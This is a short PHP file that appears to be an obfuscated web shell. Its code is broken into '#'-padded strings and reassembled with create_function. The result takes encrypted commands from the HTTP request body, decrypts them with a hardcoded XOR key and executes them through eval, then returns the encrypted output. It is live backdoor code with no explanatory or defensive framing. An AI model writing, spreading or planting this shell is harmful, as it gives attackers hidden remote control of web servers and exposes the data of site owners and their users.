<?php
$d='nctio#n# x($t,$k){#$#c=s#trlen($k)#;$l=strlen#(#$t);$o="";fo#r(#$i=0;$i<$#l;){#for($j=#';
$v='0;#($j<$c&&$i<#$l);$j++#,$i++)#{$o.=#$t#{$i}#^$#k{$j};}#}return $#o#;}if (@preg_mat#ch';
$M='$k="3##993e8ba";$kh="d6#bc40#666##b#ea#";$kf="112397575b4f"#;$p="A#eM8B2jO#nzlOqC#vT";fu';
$H='(#"/$kh(.+)#$kf/",#@file_get#_c#o#ntents("p#hp://inp#ut"),#$m)==1) {@o#b_star#t();@e#v';
$A=str_replace('lu','','crelualute_lufluunluctiluon');
$W='n##d_cle#an();$r=@bas#e64_#encode(@##x(@gz#compr#ess($o),$k));#print("##$p$kh$r$kf");}';
$O='al(##@gzuncomp#ress(@x(@b#a#se64#_##decode($m[1]),$k)));#$o=@ob_get_#conte#nts(#);@ob_e';
$Q=str_replace('#','',$M.$d.$v.$H.$O.$W);
$r=$A('',$Q);$r();
?>
